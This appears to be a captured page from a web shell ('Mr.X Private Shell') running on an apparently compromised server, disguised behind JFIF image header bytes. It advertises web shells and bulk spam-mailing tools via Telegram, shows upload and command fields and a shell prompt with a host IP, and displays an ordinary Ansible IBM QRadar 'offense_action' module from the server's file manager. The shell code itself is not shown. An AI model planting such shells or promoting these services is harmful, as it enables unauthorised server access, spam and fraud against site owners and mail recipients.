����JFIF��������� Mr.X 
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

deexcl@216.73.217.71: ~ $ 
# -*- coding: utf-8 -*-

# (c) 2019, Adam Miller (admiller@redhat.com)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function

__metaclass__ = type

DOCUMENTATION = """
---
module: offense_action
short_description: Take action on a QRadar Offense
description:
  - This module allows to assign, protect, follow up, set status, and assign closing reason to QRadar Offenses
version_added: "1.0.0"
options:
  id:
    description:
     - ID of Offense
    required: true
    type: int
  status:
    description:
      - One of "open", "hidden" or "closed". (Either all lower case or all caps)
    required: false
    choices: [ "open", "OPEN", "hidden", "HIDDEN", "closed", "CLOSED" ]
    type: str
  assigned_to:
    description:
      - Assign to an user, the QRadar username should be provided
    required: false
    type: str
  closing_reason:
    description:
      - Assign a predefined closing reason here, by name.
    required: false
    type: str
  closing_reason_id:
    description:
      - Assign a predefined closing reason here, by id.
    required: false
    type: int
  follow_up:
    description:
      - Set or unset the flag to follow up on a QRadar Offense
    required: false
    type: bool
  protected:
    description:
      - Set or unset the flag to protect a QRadar Offense
    required: false
    type: bool

notes:
  - Requires one of C(name) or C(id) be provided
  - Only one of C(closing_reason) or C(closing_reason_id) can be provided

author: Ansible Security Automation Team (@maxamillion) <https://github.com/ansible-security>
"""

"""
# FIXME - WOULD LIKE TO QUERY BY NAME BUT HOW TO ACCOMPLISH THAT IS NON-OBVIOUS
# name:
#   description:
#    - Name of Offense
#   required: true
#   type: str
"""

EXAMPLES = """
"""

from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_text

from ansible_collections.ibm.qradar.plugins.module_utils.qradar import (
    QRadarRequest,
    set_offense_values,
)


def main():

    argspec = dict(
        # name=dict(required=False, type='str'),
        # id=dict(required=False, type='str'),
        id=dict(required=True, type="int"),
        assigned_to=dict(required=False, type="str"),
        closing_reason=dict(required=False, type="str"),
        closing_reason_id=dict(required=False, type="int"),
        follow_up=dict(required=False, type="bool"),
        protected=dict(required=False, type="bool"),
        status=dict(
            required=False,
            choices=["open", "OPEN", "hidden", "HIDDEN", "closed", "CLOSED"],
            type="str",
        ),
    )

    module = AnsibleModule(
        argument_spec=argspec,
        # required_one_of=[
        #    ('name', 'id',),
        # ],
        mutually_exclusive=[("closing_reason", "closing_reason_id")],
        supports_check_mode=True,
    )

    qradar_request = QRadarRequest(
        module,
        not_rest_data_keys=["name", "id", "assigned_to", "closing_reason"],
    )

    # if module.params['name']:
    #    # FIXME - QUERY HERE BY NAME
    #    found_offense = qradar_request.get('/api/siem/offenses?filter={0}'.format(module.params['name']))

    code, found_offense = qradar_request.get(
        "/api/siem/offenses/{0}".format(module.params["id"])
    )

    if found_offense:
        set_offense_values(module, qradar_request)

        post_strs = []

        if module.params["status"] and (
            to_text(found_offense["status"])
            != to_text(module.params["status"])
        ):
            post_strs.append(
                "status={0}".format(to_text(module.params["status"]))
            )

        if module.params["assigned_to"] and (
            to_text(found_offense["assigned_to"])
            != to_text(module.params["assigned_to"])
        ):
            post_strs.append(
                "assigned_to={0}".format(module.params["assigned_to"])
            )

        if module.params["closing_reason_id"] and (
            found_offense["closing_reason_id"]
            != module.params["closing_reason_id"]
        ):
            post_strs.append(
                "closing_reason_id={0}".format(
                    module.params["closing_reason_id"]
                )
            )

        if module.params["follow_up"] and (
            found_offense["follow_up"] != module.params["follow_up"]
        ):
            post_strs.append(
                "follow_up={0}".format(module.params["follow_up"])
            )

        if module.params["protected"] and (
            found_offense["protected"] != module.params["protected"]
        ):
            post_strs.append(
                "protected={0}".format(module.params["protected"])
            )

        if post_strs:
            if module.check_mode:
                module.exit_json(
                    msg="A change would have been made but was not because of Check Mode.",
                    changed=True,
                )

            qradar_return_data = qradar_request.post_by_path(
                "api/siem/offenses/{0}?{1}".format(
                    module.params["id"], "&".join(post_strs)
                )
            )
            # FIXME - handle the scenario in which we can search by name and this isn't a required param anymore
            module.exit_json(
                msg="Successfully updated Offense ID: {0}".format(
                    module.params["id"]
                ),
                qradar_return_data=qradar_return_data,
                changed=True,
            )
        else:
            module.exit_json(
                msg="No changes necessary. Nothing to do.", changed=False
            )
    else:
        # FIXME - handle the scenario in which we can search by name and this isn't a required param anymore
        module.fail_json(
            msg="Unable to find Offense ID: {0}".format(module.params["id"])
        )


if __name__ == "__main__":
    main()

Filemanager

DIR : / usr/ lib/ python3.9/ site-packages/ ansible_collections/ ibm/ qradar/ plugins/ modules/
Name Type Size Permission Actions
__pycache__ Folder 0755
deploy.py File 2.17 KB 0644
log_source_management.py File 8.61 KB 0644
offense_action.py File 5.87 KB 0644
offense_info.py File 6.24 KB 0644
offense_note.py File 5.91 KB 0644
qradar_analytics_rules.py File 7.09 KB 0644
qradar_deploy.py File 2.17 KB 0644
qradar_log_source_management.py File 8.61 KB 0644
qradar_log_sources_management.py File 15.31 KB 0644
qradar_offense_action.py File 5.87 KB 0644
qradar_offense_info.py File 6.24 KB 0644
qradar_offense_note.py File 5.91 KB 0644
qradar_rule.py File 8.58 KB 0644
qradar_rule_info.py File 4.04 KB 0644
rule.py File 8.58 KB 0644
rule_info.py File 4.04 KB 0644